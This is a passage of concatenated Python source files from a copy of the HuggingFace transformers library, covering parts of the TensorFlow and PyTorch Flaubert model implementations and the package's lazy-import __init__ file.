config.num_labels, kernel_initializer=get_initializer(config.init_std), name="qa_outputs"
)
@unpack_inputs
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFQuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
start_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
end_positions: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: bool = False,
) -> Union[TFQuestionAnsweringModelOutput, Tuple[tf.Tensor]]:
r"""
start_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
"""
transformer_outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = transformer_outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = tf.split(logits, 2, axis=-1)
start_logits = tf.squeeze(start_logits, axis=-1)
end_logits = tf.squeeze(end_logits, axis=-1)
loss = None
if start_positions is not None and end_positions is not None:
labels = {"start_position": start_positions}
labels["end_position"] = end_positions
loss = self.hf_compute_loss(labels, (start_logits, end_logits))
if not return_dict:
output = (start_logits, end_logits) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFQuestionAnsweringModelOutput(
loss=loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFQuestionAnsweringModelOutput(
start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
)
@add_start_docstrings(
"""
Flaubert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForTokenClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForTokenClassification(TFFlaubertPreTrainedModel, TFTokenClassificationLoss):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.transformer = TFFlaubertMainLayer(config, name="transformer")
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.classifier = tf.keras.layers.Dense(
config.num_labels, kernel_initializer=get_initializer(config.init_std), name="classifier"
)
@unpack_inputs
@add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFTokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: bool = False,
) -> Union[TFTokenClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
"""
transformer_outputs = self.transformer(
input_ids=input_ids,
attention_mask=attention_mask,
langs=langs,
token_type_ids=token_type_ids,
position_ids=position_ids,
lengths=lengths,
cache=cache,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = transformer_outputs[0]
sequence_output = self.dropout(sequence_output, training=training)
logits = self.classifier(sequence_output)
loss = None if labels is None else self.hf_compute_loss(labels, logits)
if not return_dict:
output = (logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFTokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
Flaubert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_tf_xlm.TFXLMForMultipleChoice with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class TFFlaubertForMultipleChoice(TFFlaubertPreTrainedModel, TFMultipleChoiceLoss):
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.transformer = TFFlaubertMainLayer(config, name="transformer")
self.sequence_summary = TFSequenceSummary(config, initializer_range=config.init_std, name="sequence_summary")
self.logits_proj = tf.keras.layers.Dense(
1, kernel_initializer=get_initializer(config.initializer_range), name="logits_proj"
)
@property
def dummy_inputs(self):
"""
Dummy inputs to build the network.
Returns:
tf.Tensor with dummy inputs
"""
# Sometimes Flaubert has language embeddings so don't forget to build them as well if needed
if self.config.use_lang_emb and self.config.n_langs > 1:
return {
"input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
"langs": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
}
else:
return {
"input_ids": tf.constant(MULTIPLE_CHOICE_DUMMY_INPUTS, dtype=tf.int32),
}
@unpack_inputs
@add_start_docstrings_to_model_forward(
FLAUBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFMultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
langs: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
lengths: Optional[Union[np.ndarray, tf.Tensor]] = None,
cache: Optional[Dict[str, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: bool = False,
) -> Union[TFMultipleChoiceModelOutput, Tuple[tf.Tensor]]:
if input_ids is not None:
num_choices = shape_list(input_ids)[1]
seq_length = shape_list(input_ids)[2]
else:
num_choices = shape_list(inputs_embeds)[1]
seq_length = shape_list(inputs_embeds)[2]
flat_input_ids = tf.reshape(input_ids, (-1, seq_length)) if input_ids is not None else None
flat_attention_mask = tf.reshape(attention_mask, (-1, seq_length)) if attention_mask is not None else None
flat_token_type_ids = tf.reshape(token_type_ids, (-1, seq_length)) if token_type_ids is not None else None
flat_position_ids = tf.reshape(position_ids, (-1, seq_length)) if position_ids is not None else None
flat_langs = tf.reshape(langs, (-1, seq_length)) if langs is not None else None
flat_inputs_embeds = (
tf.reshape(inputs_embeds, (-1, seq_length, shape_list(inputs_embeds)[3]))
if inputs_embeds is not None
else None
)
if lengths is not None:
logger.warning(
"The `lengths` parameter cannot be used with the Flaubert multiple choice models. Please use the "
"attention mask instead.",
)
lengths = None
transformer_outputs = self.transformer(
flat_input_ids,
flat_attention_mask,
flat_langs,
flat_token_type_ids,
flat_position_ids,
lengths,
cache,
head_mask,
flat_inputs_embeds,
output_attentions,
output_hidden_states,
return_dict=return_dict,
training=training,
)
output = transformer_outputs[0]
logits = self.sequence_summary(output)
logits = self.logits_proj(logits)
reshaped_logits = tf.reshape(logits, (-1, num_choices))
loss = None if labels is None else self.hf_compute_loss(labels, reshaped_logits)
if not return_dict:
output = (reshaped_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFMultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None, None), tf.int32, name="input_ids"),
"attention_mask": tf.TensorSpec((None, None, None), tf.int32, name="attention_mask"),
"token_type_ids": tf.TensorSpec((None, None, None), tf.int32, name="token_type_ids"),
}
]
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving
def serving(self, inputs: Dict[str, tf.Tensor]):
output = self.call(input_ids=inputs)
return self.serving_output(output)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForMultipleChoice.serving_output
def serving_output(self, output: TFMultipleChoiceModelOutput) -> TFMultipleChoiceModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFMultipleChoiceModelOutput(logits=output.logits, hidden_states=hs, attentions=attns)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,488 | src/transformers/models/flaubert/__init__.py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_tf_available, is_torch_available
_import_structure = {
"configuration_flaubert": ["FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "FlaubertConfig", "FlaubertOnnxConfig"],
"tokenization_flaubert": ["FlaubertTokenizer"],
}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_flaubert"] = [
"FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST",
"FlaubertForMultipleChoice",
"FlaubertForQuestionAnswering",
"FlaubertForQuestionAnsweringSimple",
"FlaubertForSequenceClassification",
"FlaubertForTokenClassification",
"FlaubertModel",
"FlaubertWithLMHeadModel",
"FlaubertPreTrainedModel",
]
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_tf_flaubert"] = [
"TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST",
"TFFlaubertForMultipleChoice",
"TFFlaubertForQuestionAnsweringSimple",
"TFFlaubertForSequenceClassification",
"TFFlaubertForTokenClassification",
"TFFlaubertModel",
"TFFlaubertPreTrainedModel",
"TFFlaubertWithLMHeadModel",
]
if TYPE_CHECKING:
from .configuration_flaubert import FLAUBERT_PRETRAINED_CONFIG_ARCHIVE_MAP, FlaubertConfig, FlaubertOnnxConfig
from .tokenization_flaubert import FlaubertTokenizer
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_flaubert import (
FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
FlaubertForMultipleChoice,
FlaubertForQuestionAnswering,
FlaubertForQuestionAnsweringSimple,
FlaubertForSequenceClassification,
FlaubertForTokenClassification,
FlaubertModel,
FlaubertPreTrainedModel,
FlaubertWithLMHeadModel,
)
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_tf_flaubert import (
TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
TFFlaubertForMultipleChoice,
TFFlaubertForQuestionAnsweringSimple,
TFFlaubertForSequenceClassification,
TFFlaubertForTokenClassification,
TFFlaubertModel,
TFFlaubertPreTrainedModel,
TFFlaubertWithLMHeadModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 57,783 | src/transformers/models/flaubert/modeling_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Flaubert model, based on XLM."""
import itertools
import math
import random
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import torch
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import gelu
from ...modeling_outputs import (
BaseModelOutput,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel, SequenceSummary, SQuADHead
from ...pytorch_utils import apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_flaubert import FlaubertConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "flaubert/flaubert_base_cased"
_CONFIG_FOR_DOC = "FlaubertConfig"
FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"flaubert/flaubert_small_cased",
"flaubert/flaubert_base_uncased",
"flaubert/flaubert_base_cased",
"flaubert/flaubert_large_cased",
# See all Flaubert models at https://huggingface.co/models?filter=flaubert
]
# Copied from transformers.models.xlm.modeling_xlm.create_sinusoidal_embeddings
def create_sinusoidal_embeddings(n_pos, dim, out):
position_enc = np.array([[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)])
out[:, 0::2] = torch.FloatTensor(np.sin(position_enc[:, 0::2]))
out[:, 1::2] = torch.FloatTensor(np.cos(position_enc[:, 1::2]))
out.detach_()
out.requires_grad = False
# Copied from transformers.models.xlm.modeling_xlm.get_masks
def get_masks(slen, lengths, causal, padding_mask=None):
"""
Generate hidden states mask, and optionally an attention mask.
"""
alen = torch.arange(slen, dtype=torch.long, device=lengths.device)
if padding_mask is not None:
mask = padding_mask
else:
assert lengths.max().item() <= slen
mask = alen < lengths[:, None]
# attention mask is the same as mask, or triangular inferior attention (causal)
bs = lengths.size(0)
if causal:
attn_mask = alen[None, None, :].repeat(bs, slen, 1) <= alen[None, :, None]
else:
attn_mask = mask
# sanity check
assert mask.size() == (bs, slen)
assert causal is False or attn_mask.size() == (bs, slen, slen)
return mask, attn_mask
# Copied from transformers.models.xlm.modeling_xlm.MultiHeadAttention
class MultiHeadAttention(nn.Module):
NEW_ID = itertools.count()
def __init__(self, n_heads, dim, config):
super().__init__()
self.layer_id = next(MultiHeadAttention.NEW_ID)
self.dim = dim
self.n_heads = n_heads
self.dropout = config.attention_dropout
assert self.dim % self.n_heads == 0
self.q_lin = nn.Linear(dim, dim)
self.k_lin = nn.Linear(dim, dim)
self.v_lin = nn.Linear(dim, dim)
self.out_lin = nn.Linear(dim, dim)
self.pruned_heads = set()
def prune_heads(self, heads):
attention_head_size = self.dim // self.n_heads
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.n_heads, attention_head_size, self.pruned_heads)
# Prune linear layers
self.q_lin = prune_linear_layer(self.q_lin, index)
self.k_lin = prune_linear_layer(self.k_lin, index)
self.v_lin = prune_linear_layer(self.v_lin, index)
self.out_lin = prune_linear_layer(self.out_lin, index, dim=1)
# Update hyper params
self.n_heads = self.n_heads - len(heads)
self.dim = attention_head_size * self.n_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(self, input, mask, kv=None, cache=None, head_mask=None, output_attentions=False):
"""
Self-attention (if kv is None) or attention over source sentence (provided by kv).
"""
# Input is (bs, qlen, dim)
# Mask is (bs, klen) (non-causal) or (bs, klen, klen)
bs, qlen, dim = input.size()
if kv is None:
klen = qlen if cache is None else cache["slen"] + qlen
else:
klen = kv.size(1)
# assert dim == self.dim, f'Dimensions do not match: {dim} input vs {self.dim} configured'
n_heads = self.n_heads
dim_per_head = self.dim // n_heads
mask_reshape = (bs, 1, qlen, klen) if mask.dim() == 3 else (bs, 1, 1, klen)
def shape(x):
"""projection"""
return x.view(bs, -1, self.n_heads, dim_per_head).transpose(1, 2)
def unshape(x):
"""compute context"""
return x.transpose(1, 2).contiguous().view(bs, -1, self.n_heads * dim_per_head)
q = shape(self.q_lin(input)) # (bs, n_heads, qlen, dim_per_head)
if kv is None:
k = shape(self.k_lin(input)) # (bs, n_heads, qlen, dim_per_head)
v = shape(self.v_lin(input)) # (bs, n_heads, qlen, dim_per_head)
elif cache is None or self.layer_id not in cache:
k = v = kv
k = shape(self.k_lin(k)) # (bs, n_heads, qlen, dim_per_head)
v = shape(self.v_lin(v)) # (bs, n_heads, qlen, dim_per_head)
if cache is not None:
if self.layer_id in cache:
if kv is None:
k_, v_ = cache[self.layer_id]
k = torch.cat([k_, k], dim=2) # (bs, n_heads, klen, dim_per_head)
v = torch.cat([v_, v], dim=2) # (bs, n_heads, klen, dim_per_head)
else:
k, v = cache[self.layer_id]
cache[self.layer_id] = (k, v)
scores = torch.matmul(q, k.transpose(2, 3)) / math.sqrt(dim_per_head) # (bs, n_heads, qlen, klen)
mask = (mask == 0).view(mask_reshape).expand_as(scores) # (bs, n_heads, qlen, klen)
scores.masked_fill_(mask, torch.finfo(scores.dtype).min) # (bs, n_heads, qlen, klen)
weights = nn.functional.softmax(scores.float(), dim=-1).type_as(scores) # (bs, n_heads, qlen, klen)
weights = nn.functional.dropout(weights, p=self.dropout, training=self.training) # (bs, n_heads, qlen, klen)
# Mask heads if we want to
if head_mask is not None:
weights = weights * head_mask
context = torch.matmul(weights, v) # (bs, n_heads, qlen, dim_per_head)
context = unshape(context) # (bs, qlen, dim)
outputs = (self.out_lin(context),)
if output_attentions:
outputs = outputs + (weights,)
return outputs
# Copied from transformers.models.xlm.modeling_xlm.TransformerFFN
class TransformerFFN(nn.Module):
def __init__(self, in_dim, dim_hidden, out_dim, config):
super().__init__()
self.dropout = config.dropout
self.lin1 = nn.Linear(in_dim, dim_hidden)
self.lin2 = nn.Linear(dim_hidden, out_dim)
self.act = gelu if config.gelu_activation else nn.functional.relu
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
def forward(self, input):
return apply_chunking_to_forward(self.ff_chunk, self.chunk_size_feed_forward, self.seq_len_dim, input)
def ff_chunk(self, input):
x = self.lin1(input)
x = self.act(x)
x = self.lin2(x)
x = nn.functional.dropout(x, p=self.dropout, training=self.training)
return x
FLAUBERT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`FlaubertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAUBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
lengths (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Length of each sentence that can be used to avoid performing attention on padding token indices. You can
also use `attention_mask` for the same result (see above), kept here for compatibility. Indices selected in
`[0, ..., input_ids.size(-1)]`:
cache (`Dict[str, torch.FloatTensor]`, *optional*):
Dictionary strings to `torch.FloatTensor` that contains precomputed hidden-states (key and values in the
attention blocks) as computed by the model (see `cache` output below). Can be used to speed up sequential
decoding. The dictionary object will be modified in-place during the forward pass to add newly computed
hidden-states.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare Flaubert Model transformer outputting raw hidden-states without any specific head on top.",
FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_xlm.XLMPredLayer with XLM->Flaubert
class FlaubertPredLayer(nn.Module):
"""
Prediction layer (cross_entropy or adaptive_softmax).
"""
def __init__(self, config):
super().__init__()
self.asm = config.asm
self.n_words = config.n_words
self.pad_index = config.pad_index
dim = config.emb_dim
if config.asm is False:
self.proj = nn.Linear(dim, config.n_words, bias=True)
else:
self.proj = nn.AdaptiveLogSoftmaxWithLoss(
in_features=dim,
n_classes=config.n_words,
cutoffs=config.asm_cutoffs,
div_value=config.asm_div_value,
head_bias=True, # default is False
)
def forward(self, x, y=None):
"""Compute the loss, and optionally the scores."""
outputs = ()
if self.asm is False:
scores = self.proj(x)
outputs = (scores,) + outputs
if y is not None:
loss = nn.functional.cross_entropy(scores.view(-1, self.n_words), y.view(-1), reduction="mean")
outputs = (loss,) + outputs
else:
scores = self.proj.log_prob(x)
outputs = (scores,) + outputs
if y is not None:
_, loss = self.proj(x, y)
outputs = (loss,) + outputs
return outputs
# Copied from transformers.models.xlm.modeling_xlm.XLMPreTrainedModel with XLM->Flaubert
class FlaubertPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = FlaubertConfig
load_tf_weights = None
base_model_prefix = "transformer"
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
@property
def dummy_inputs(self):
inputs_list = torch.tensor([[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]])
attns_list = torch.tensor([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]])
if self.config.use_lang_emb and self.config.n_langs > 1:
langs_list = torch.tensor([[1, 1, 0, 0, 1], [1, 1, 1, 0, 0], [1, 0, 0, 1, 1]])
else:
langs_list = None
return {"input_ids": inputs_list, "attention_mask": attns_list, "langs": langs_list}
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, nn.Embedding):
if self.config is not None and self.config.embed_init_std is not None:
nn.init.normal_(module.weight, mean=0, std=self.config.embed_init_std)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
if isinstance(module, nn.Linear):
if self.config is not None and self.config.init_std is not None:
nn.init.normal_(module.weight, mean=0, std=self.config.init_std)
if module.bias is not None:
nn.init.constant_(module.bias, 0.0)
if isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
class FlaubertModel(FlaubertPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config): # , dico, is_encoder, with_output):
super().__init__(config)
# encoder / decoder, output layer
self.is_encoder = config.is_encoder
self.is_decoder = not config.is_encoder
if self.is_decoder:
raise NotImplementedError("Currently Flaubert can only be used as an encoder")
# self.with_output = with_output
self.causal = config.causal
# dictionary / languages
self.n_langs = config.n_langs
self.use_lang_emb = config.use_lang_emb
self.n_words = config.n_words
self.eos_index = config.eos_index
self.pad_index = config.pad_index
# self.dico = dico
# self.id2lang = config.id2lang
# self.lang2id = config.lang2id
# assert len(self.dico) == self.n_words
# assert len(self.id2lang) == len(self.lang2id) == self.n_langs
# model parameters
self.dim = config.emb_dim # 512 by default
self.hidden_dim = self.dim * 4 # 2048 by default
self.n_heads = config.n_heads # 8 by default
self.n_layers = config.n_layers
self.dropout = config.dropout
self.attention_dropout = config.attention_dropout
assert self.dim % self.n_heads == 0, "transformer dim must be a multiple of n_heads"
# embeddings
self.position_embeddings = nn.Embedding(config.max_position_embeddings, self.dim)
if config.sinusoidal_embeddings:
create_sinusoidal_embeddings(config.max_position_embeddings, self.dim, out=self.position_embeddings.weight)
if config.n_langs > 1 and config.use_lang_emb:
self.lang_embeddings = nn.Embedding(self.n_langs, self.dim)
self.embeddings = nn.Embedding(self.n_words, self.dim, padding_idx=self.pad_index)
self.layer_norm_emb = nn.LayerNorm(self.dim, eps=config.layer_norm_eps)
# transformer layers
self.attentions = nn.ModuleList()
self.layer_norm1 = nn.ModuleList()
self.ffns = nn.ModuleList()
self.layer_norm2 = nn.ModuleList()
# if self.is_decoder:
# self.layer_norm15 = nn.ModuleList()
# self.encoder_attn = nn.ModuleList()
for _ in range(self.n_layers):
self.attentions.append(MultiHeadAttention(self.n_heads, self.dim, config=config))
self.layer_norm1.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
# if self.is_decoder:
# self.layer_norm15.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
# self.encoder_attn.append(MultiHeadAttention(self.n_heads, self.dim, dropout=self.attention_dropout))
self.ffns.append(TransformerFFN(self.dim, self.hidden_dim, self.dim, config=config))
self.layer_norm2.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
if hasattr(config, "pruned_heads"):
pruned_heads = config.pruned_heads.copy().items()
config.pruned_heads = {}
for layer, heads in pruned_heads:
if self.attentions[int(layer)].n_heads == config.n_heads:
self.prune_heads({int(layer): list(map(int, heads))})
# Initialize weights and apply final processing
self.post_init()
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.layerdrop = getattr(config, "layerdrop", 0.0)
self.pre_norm = getattr(config, "pre_norm", False)
self.register_buffer(
"position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)), persistent=False
)
# Copied from transformers.models.xlm.modeling_xlm.XLMModel.get_input_embeddings
def get_input_embeddings(self):
return self.embeddings
# Copied from transformers.models.xlm.modeling_xlm.XLMModel.set_input_embeddings
def set_input_embeddings(self, new_embeddings):
self.embeddings = new_embeddings
# Copied from transformers.models.xlm.modeling_xlm.XLMModel._prune_heads
